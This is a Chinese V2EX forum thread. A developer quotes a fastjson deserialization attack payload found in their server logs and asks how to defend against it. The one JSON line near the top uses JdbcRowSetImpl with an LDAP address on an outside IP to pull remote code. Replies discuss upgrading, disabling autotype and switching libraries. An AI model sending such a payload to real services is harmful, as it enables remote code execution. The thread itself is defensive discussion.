服务疑似被尝试 fastjson 漏洞攻击

V2EX = way to explore

V2EX 是一个关于分享和探索的地方

现在注册

已注册用户请登录

这是一个创建于 930 天前的主题，其中的信息可能已经有所发展或是发生改变。

日志中查到有人发送异常参数至接口

{"x":{{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://9.4.131.68:1389/fastjsonfc5fd1bcac3b753a7d4fa9dab78d162e","autoCommit":true}}

查了下可能是 fastjson 反序列化攻击，目前项目使用的 fastjson 版本是 1.2.73 ，好像不在攻击范围内，请问下还有其他防御措施吗

fastjson

攻击

序列化

ldap

13 条回复 • 2022-05-07 14:53:52 +08:00

Jooooooooo

2022-05-06 16:59:28 +08:00

换 jackson

moe3000

2022-05-06 17:00:23 +08:00

@Jooooooooo 下个、下个版本一定

BBCCBB

2022-05-06 17:02:58 +08:00

不知道关掉这个按 @type 来反序列化的功能能不能防止这个问题? 就 http 请求的参数的反序列化用不到这个 @type 的功能.

bthulu

2022-05-06 17:06:39 +08:00

不在攻击范围内, 有空就升级到最新版, 没空就不管它. jackson 一样有这样的问题.

clf

2022-05-06 17:10:19 +08:00

公司的代码规范检查插件里。就直接代码检查 com.alibaba 的包。有用到的禁止提交代码。gitlab 的 hooks 也是加了检查。

RainCats

2022-05-06 17:40:06 +08:00

@clf 有点极端了吧，完全不用阿里系的东西

clf

2022-05-06 17:54:00 +08:00

@RainCats #6 也用的，但只用开源基金会支持的，阿里已经捐给 apache 的都是 apache 的包名。主要是不用 fastjson

ufan0

2022-05-06 21:46:01 +08:00

@clf #7 咱公司上海有开放招聘吗？想投！！！

fff333

2022-05-06 21:48:35 +08:00

@moe3000 gson

banmuyutian

2022-05-07 10:37:10 +08:00

@clf #5
我现在还用的阿里项目仅剩下 easyexcel

houzhishi

2022-05-07 13:38:00 +08:00

脚本小子在瞎跑，不用太在意，结合业务看是否可以关闭自省 @type

clf

2022-05-07 14:46:09 +08:00

@banmuyutian 我们是直接用的 POI ，和基础服务的数据结构（比如表单等）封装了接口。

xiaopigfly

2022-05-07 14:53:52 +08:00

问题不大，只要放到公网就会有人扫描。正常的。